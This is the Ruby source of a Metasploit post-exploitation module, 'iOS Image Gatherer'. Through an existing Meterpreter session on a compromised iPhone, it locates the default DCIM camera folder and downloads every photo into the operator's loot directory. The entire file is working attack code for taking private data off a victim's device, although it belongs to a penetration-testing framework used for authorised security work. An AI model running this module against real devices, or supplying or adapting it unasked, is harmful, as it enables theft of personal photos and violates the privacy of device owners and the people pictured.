metasploit-framework/modules/post/apple_ios/gather/ios_image_gather.rb

64 lines
1.7 KiB
Ruby

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'iOS Image Gatherer',
'Description' => %q{
This module collects images from iPhones.
Module was tested on iOS 10.3.3 on an iPhone 5.
},
'License' => MSF_LICENSE,
'Author' => [ 'Shelby Pace' ], # Metasploit Module
'Platform' => [ 'apple_ios' ],
'SessionTypes' => [ 'meterpreter' ],
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
core_channel_close
core_channel_eof
core_channel_open
core_channel_read
stdapi_fs_stat
]
}
}
)
)
end
def enum_img(f_path)
path = File.join(Msf::Config.loot_directory, Rex::Text.rand_text_alpha(6))
local_path = File.expand_path(path)
ios_imgs = dir(f_path)
print_status("Directory for iOS images: #{local_path}")
opts = { 'block_size' => 262144 }
ios_imgs.each do |img|
print_status("Downloading image: #{img}")
client.fs.file.download_file("#{local_path}/#{img}", "#{f_path}/#{img}", opts)
rescue StandardError
print_error("#{img} could not be downloaded")
end
end
def run
img_path = '/private/var/mobile/Media/DCIM/100APPLE'
unless directory?(img_path)
fail_with(Failure::NotFound, 'Could not find the default image file path')
end
print_good('Image path found. Will begin searching for images...')
enum_img(img_path)
end
end